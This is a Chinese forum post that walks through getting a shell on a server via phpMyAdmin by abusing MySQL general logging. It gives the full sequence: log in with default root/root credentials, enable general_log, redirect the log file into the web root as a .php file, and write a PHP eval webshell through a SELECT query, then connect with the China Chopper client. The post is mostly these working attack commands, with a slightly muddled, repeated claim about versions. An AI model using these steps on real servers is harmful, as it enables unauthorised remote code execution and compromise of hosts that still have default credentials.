日志文件phpMyAdminGetShell

徐浩洋   ·   发表于 2022-03-28 23:47:30   ·   技术文章

日志文件phpMyAdminGetShell

前言:我的服务器是挂机用的,无趣的时候安装了vc9与phpstudy,并没有挂任何网站,但是也被getshell,后来将www文件夹下面的opp.php改成txt格式我就知道了这是日志法getshell。

首先搞懂什么是phpmyadmin,他就是一个可以远程连接数据库的方便功能。

首先他必须具备phpmyadmin功能

看到登录框了吗?看到路径了吗?

它还需要具备第二个条件,弱口令(包含初始密码)

我就是吃了初始密码的亏

账号为root 密码为root

然后要明白为什么要用日志去搞

因为大于5.0的版本会生成日志

第三个条件,phpmyadmin大于5.0第三个条件,phpmyadmin大于5.0

  1. SELECT @@version , @@version_comment

此时你要想让大马在服务器当中发挥它?作用就需要以php文件的形式存在
所以,就要在日志保存状态(general log)与保存路径(general_log_file)做动作

第四个条件,日志功能开启

  1. set global general_log=on
  2. select @@basedir
  3. SET global general_log_file='C:/phpStudy/WWW/h4nk.php'

然后就是上大马
  1. SELECT '<?php eval(@$_POST["h4nk"]);?>'
上菜刀

用户名金币积分时间理由
Track-劲夫 50.00 0 2022-04-02 15:03:22 一个受益终生的帖子~~

打赏我,让我更有动力~

1 条回复   |  直到 2022-4-12 | 676 次浏览

lihua666
发表于 2022-4-12

额,这是上古的洞吧

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.